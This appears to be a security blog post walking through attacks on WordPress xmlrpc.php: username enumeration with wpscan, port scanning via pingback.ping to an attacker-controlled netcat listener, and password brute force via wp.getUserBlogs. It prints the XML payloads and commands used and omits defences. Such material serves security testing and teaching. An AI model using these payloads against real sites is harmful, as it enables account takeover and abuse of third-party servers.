XML-RPC PHP WordPress Vulnerabilities
Hi Readers,
In this blog, I am going to explain “What are the xmlrpc.php WordPress Vulnerabilities?” and “How it will get exploited?” Mainly, I am targeting following Attacks,
- Username Enumeration.
- Cross-Site-Port-Attack (XSPA) OR Port Scanning.
- Brute-Force Attack using xmlrpc.php.
Before that, I would like to explain insights of WordPress and xmlrpc.php.
What is WordPress?
WordPress is web publishing software you can use to create your own website or blog. Nowadays, WordPress has become one of the most popular web publishing platforms. WordPress is capable of creating any style of website, from a simple blog to a full-featured business website.
What is Xmlrpc.php in WordPress?
XML-RPC is a feature of WordPress that enables data to be transmitted, with HTTP acting as the ‘transport mechanism’ and XML as the ‘encoding mechanism’. Basically it is an Application Programming Interface that allows developers to communicate with the website remotely using any kind of gadgets for ex: Developers can upload, modify, delete or update website contents using there mobile device if they are not carrying laptop with them.
Following are some important methods used to determine and exploit above mentioned vulnerabilities,
i) system.listMethods
ii) wp.getUserBlogs
iii) wp.getCategories
iv) metaWeblog.getUsersBlogs
So, Without wasting more time let’s jump into POC to analyze step by step exploitation.
Target URL: http://redacted.com/xmlrpc.php (Dummy Domain Name to Masked Original one)
POC:
Step 1: Navigate to domain name following xmlrpc.php page and if you are getting below message then xmlrpc.php may be disabled and precautions are already taken to protect this attacks.
Step 2: If you are getting below message then it means xmlrpc.php enabled on remote server.
Step 3: Capture the request in web proxy tool like Burp Suite. As shown in below screenshot xmlrpc.php page only accept POST request.
Step 4: In the next step send the POST request to check what are the methods are enabled on XML RPC server. As shown in below request “system.listMethods” is used to check supporting methods on XML RPC server .
As you can notice above, all the methods that are helpful in performing attack are enabled on xmlrpc remote server. Lets performed above mentioned attacks one after another.
- Username Enumeration: For Username enumeration, I am going to use wpscan which is popular WordPress scanner for scanning WordPress Vulnerabilities.
You can download and install wpscan from given URL:
wpscan: https://github.com/wpscanteam/wpscan.git
Command: wpscan --url http://www.redacted.com --enumerate u
As shown in below evidence, I was successfully able to collect the correct username which is lets say “Actor” as original username hidden intentionally.
2. Cross-Site-Port-Attack (XSPA) OR Port Scanning:
To perform XSPA or Port Scanning we need to check what are the methods are supported by XML-RPC and mainly “pingback.ping” is the one which is abused by attacker to launch XSPA or DDOS attacks. As we know “pingback.ping” is enabled on XML-RPC server(from Step 4).
XSPA is achieved in the following way,
- Since we want the server to ping back to us, we need a public IP/server to listen on. In this example, I am using Cloud Instance of Kali Linux to host a server(http://pt.drspitfire.com) listening on HTTP port 80
- Fire up Kali Linux and start listener on PORT 80. The commands used to achieve this are:
$ nc -lvp 80
$ GET / HTTP/1.1
$ Host: pt.drspitfire.com
Now, we need to send pingback request to perform port scan. In the below screenshot pingback request has been sent to check port number 4447 is open on test server “ http://pt.drspitfire.com ”. We required two parameters in request body.
- Pingback call to external test server (Here, http://pt.drspitfire.com) along with PORT (Here, 80). This is basically attacker controllable server.
- URL to A Valid Blog on the target website. We need to include following sample XML data into POST request body.
<?xml version=”1.0" encoding=”UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>YOUR_Test_SERVER:YOUR_PORT</string></value>
</param>
<param>
<value><string>URL_TO_A_Valid_BLOG_ON_THE_WEBSITE</string></value>
</param>
</params>
</methodCall>As shown in below evidence, When Port is closed on external test server then response time is low i.e. 763 milliseconds and there is no traces on our listener recorded as if now.
As shown in below evidence, When Port is open on external test server then response time is increased to i.e. 12,028 milliseconds and there are traces on our listener recorded as below.
As soon as the above request is sent, the victim host (x.xx.242.211) gets an entry in its log file with a request originating from the WordPress domain verifying the ping-back. Which can be seen in the below screenshot.
3 Brute Force Attack Using xmlrpc.php:
Basically, Following are the methods which may cause brute force attack if that is enabled on xmlrpc server.
1. wp.getUserBlogs
2. wp.getCategories
3. metaWeblog.getUsersBlogs
As we know, all the above methods are enabled on xmlrpc server (from step 4)
Now, recall our first attack where we have enumerated username “Actor”. Now we will use our enumerated username and list of passwords to perform Brute force attack using wp.getUserBlogs method.
to perform Brute force attack we are using following sample XML data along with username Actor and some random password.
<?xml version=”1.0" encoding=”UTF-8"?>
<methodCall>
<methodName>wp.getUserBlogs</methodName>
<params>
<param><value>Actor</value></param>
<param><value>Actor123</value></param>
</params>
</methodCall>
As shown below, Applying brute force attack using wp.getUsersBlogs method. On correct password attacker will have Users dashboard but in this case none of tried password worked from applied password list.
I hope this will help to understand attack vectors if xmlrpc.php enabled. I am not explaining precautions as there are tons of blogs and content available which guides to disable xmlrpc on remote server.
Suggestions are always welcome!
Please do follow for further readings,
Linkedin: https://www.linkedin.com/in/bughuntermaddy
Twitter: https://twitter.com/bughuntermaddy?s=08
Thank You!
